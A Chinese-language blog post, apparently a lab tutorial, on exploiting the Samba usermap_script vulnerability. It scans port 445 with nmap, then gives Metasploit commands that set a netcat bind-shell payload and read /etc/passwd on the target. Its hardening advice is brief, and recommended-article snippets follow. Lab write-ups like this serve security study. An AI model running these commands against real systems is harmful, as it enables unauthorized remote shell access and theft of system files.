Samba漏洞详解

最新推荐文章于 2023-12-17 21:33:13 发布
最新推荐文章于 2023-12-17 21:33:13 发布
阅读量393 收藏 1
点赞数 1
分类专栏: 漏洞详解 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64593235/article/details/130250982
版权

  • 准备工作

  • nmap扫描

  • Samba漏洞利用

  • 漏洞加固

准备工作

准备一台开启445端口的靶机和一台渗透机方便测试

nmap扫描

nmap -sV -p445 172.16.1.32 -T5

通过扫描发现445端口开启

漏洞利用

use multi/samba/usermap_script

模块利用

set payload cmd/unix/bind_netcat

设置载荷模块

set rhost 172.16.1.32

设置靶机ip

set lhost 172.16.1.94

设置攻击机ip(即kali机ip)

cat /etc/passwd

发现成功回弹用户信息,渗透成功

漏洞加固

可以通过开启防火墙,进行防护,本文用的445端口,加固的话,禁用445端口就好了。

注:文章中的所有内容仅供做学习使用,任何人用此方法进行未经授权的渗透行为都与文章与我本人无关,请各位大佬不要进行未经授权的渗透行为……

北冥曙光
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安装samba服务器步骤.docx
02-06
《安装Samba服务器详解Samba服务器是一种在Linux和Windows之间实现文件和打印机共享的解决方案,它使得不同操作系统间的网络资源得以无缝对接。本文将详细介绍如何在CentOS 7虚拟机和Windows Server 2012上搭建...
Metaspliot 控制终端利用Samba漏洞渗透
qq_50854662的博客
05-29 423
Samba简介 Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成,Samba是面向Linux和Unix环境的Windows互操作性套件。它适用于在可能包括Linux、Unix、Windows、macOS及其他操作系统的异构环境下工作的那些人。Samba使用服务器消息块(SMB)协议,Windows系统使用该协议相互联系。使用Samba,你可以让Linux系统将驱动器映射到Windows系统,可以让Windows系统将驱动器映射到Linux系统,不过后者的可能性大
linux samba 漏洞 exp,smaba漏洞总结
weixin_39816448的博客
05-20 1737
由于我无法确定具体影响的具体版本,所以samba版本在4.6.4之下都视为有漏洞存在。1,Samba任意文件访问漏洞(CNA-2004-0815)漏洞简介Samba是一个开源/免费软件套件,为SMB / CIFS客户提供无缝文件和打印服务。远程利用Samba中的输入验证漏洞允许攻击者访问指定共享路径之外的文件和目录。漏洞利用条件漏洞使用了samba软件套件,通常在445端口或者139端口。影响版本...
EMPIRE BREAKOUT渗透记录
althumi的博客
12-17 379
【代码】EMPIRE BREAKOUT渗透记录。
永恒之蓝windows7:445端口漏洞
weixin_43836806的博客
07-13 8469
首先我们来了解一下windows下445端口的作用,445端口是SMB服务端口。 SMB是一个协议名,全称是Server Message Block(服务器消息快协议),用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居由它实现。是应用层(和表示层)协议,使用C/S架构,其工作的端口与其使用的协议有关。 当远程连接计算机访问共享资源时有两种方式: \\共享计算机地址\共IP享资源路径 \\共享计算机名\共享资源路径 ...
靶机练习 No.22 Vulnhub靶机 Breakout samba,webmin,tar提权
YouthBelief的博客
01-24 3827
0x00 环境准备 靶机下载 https://www.vulnhub.com/entry/empire-breakout,751/ 启动方式 VMware 启动 版本信息 Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire 靶机描述 Difficulty: Easy This box was created to be an E
linux smb 漏洞_Samba远程代码执行漏洞(CVE-2017-7494)
weixin_35241774的博客
12-23 984
我自横刀向天笑 去留肝胆两昆仑原本想复现一下CVE-2017-7494漏洞再分享出来的,没曾想过程一波三折,结果还铩羽而归。诶,还是在此记录一下失败的复现过程吧,为了纪念一下折腾不止的岁月,还有原谅我没有最终复现成功-!-。关于此漏洞的介绍不用多说,可以移步Samba远程代码执行漏洞|Freebuf。Samba远程代码执行漏洞被业内称为linux版的永恒之蓝,危害可想而知。当然相比windows来...
RHEL5下samba配置
09-03
确保Samba的安全性至关重要,这包括限制匿名访问、启用强密码策略、定期更新Samba软件以修复安全漏洞。此外,可以使用`smbpasswd`命令管理Samba用户的密码,以及`testparm`命令检查配置文件的语法错误。 总之,配置...
SARA 漏洞评估工具
01-02
**SARA漏洞评估工具详解** SARA,全称为"Security Auditing and Reporting Application",是一款功能强大的网络安全评估工具,它的设计灵感来源于早期的SATAN(Security Administrator Toolkit for Analyzing ...
各个端口详解
06-17
### 各个端口详解 #### 0号端口(Reserved) - **含义**:0号端口通常被操作系统保留,用于内部系统服务。 - **使用情况**:一般不建议应用程序使用0号端口,因为它可能被操作系统用来为某些系统服务提供一个特殊的...
文件共享之samba服务器(cifs)
01-09
同时,定期更新Samba软件以防止已知的安全漏洞至关重要。 **7. 配置Samba与Windows域集成** 如果要在Linux环境中实现Windows域的集成,Samba需要配置为Domain Controller或成员服务器。这涉及到复杂的设置,包括DNS...
2.8 利用samba漏洞进行渗透
qq_55202378的博客
07-17 2378
samba漏洞
centos7.5 Samba-4.10.16安全漏洞修复
linux小菜鸡的博客
10-26 1014
​ 先使用ps命令查看到smbd进程id,然后使用kill杀掉进程。漏洞原因是因为smb启用了较低版本的协议。操作系统:centos 7.5。Samba版本:4.10.16。保存退出后重启Samba
靶机渗透练习11-Tiki
hirak0的博客
04-15 2276
靶机描述 靶机地址:https://www.vulnhub.com/entry/tiki-1,525/ Description Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that. This is an OSCP Prep Box, its based on a CVE I recently foun
Linux Samba远程代码执行漏洞(CVE-2017-7494)漏洞复现
旺仔Sec&blog
05-29 2194
1.该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 2.主要是利用smb上的反弹shell漏洞,进行远程代码执行 3.samba3.5.0 到4.6.4/4.5.10/4.4.14的中间版本、docker
利用samba漏洞入侵linux主机(samba低版本漏洞利用)
weixin_62870602的博客
08-11 3147
复现samba漏洞入侵linux主机
Windows7 445端口漏洞
qq_56889067的博客
11-17 1971
使用nmap扫描靶机,可获得信息 这是一个win7操作系统,以及他开启了445端口。 我们这里打开msf调用17_010模块进行渗透测试。 然后设置目标靶机直接exploit 。 回显下面端口我们就可以进行很多操作 如在run vnc 可以监听靶机此刻在干什么。如果靶机未进入用户则不会监听。当然监听不能进行操作。 还可以开启靶机的远程桌面服务端口 ,使用命令前我们关闭靶机远程桌面。 使用命令 run getgui -e,然后使用kali渗透机远程桌面进行测试 使用rdesk...
Samba远程代码执行漏洞(CVE-2017-7494)复现
m0_48520508的博客
01-06 2482
0x00简介 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。 0x
Samba 远程命令执行漏洞(CVE-2017-7494)
07-29 4197
Samba 远程命令执行漏洞(CVE-2017-7494)
CVE-2020-0796补丁
最新发布
07-03
CVE-2020-0796是一个安全漏洞的标识符,通常由Common Vulnerabilities and Exposures(公共漏洞及暴露)项目维护。这个特定的漏洞可能涉及到不同的软件产品或服务,但一般来说,它是对某个软件系统的一个严重弱点,可能导致未经授权的访问、数据泄露或其他形式的安全威胁。 CVE-2020-0796补丁是指针对这一漏洞的具体修复程序。开发商发布该补丁是为了修补源代码中的缺陷,防止攻击者利用已知的漏洞执行恶意活动。安装此补丁后,系统会增强安全性,使用户能够避免因CVE-2020-0796导致的潜在风险。 要了解CVE-2020-0796的具体细节,比如它影响的是哪个软件、其影响范围和严重程度,以及如何下载和应用补丁,你需要查看相关的官方公告、厂商发布的安全更新说明或者是网络安全专业网站的报告。如果你的操作系统或应用程序受到影响,应尽快获取并安装相应的补丁,以保障系统的安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值